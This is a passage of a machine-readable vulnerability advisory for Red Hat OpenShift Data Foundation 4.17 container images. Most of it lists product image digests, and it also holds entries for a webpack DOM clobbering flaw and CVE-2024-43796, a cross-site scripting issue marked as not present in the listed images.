"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
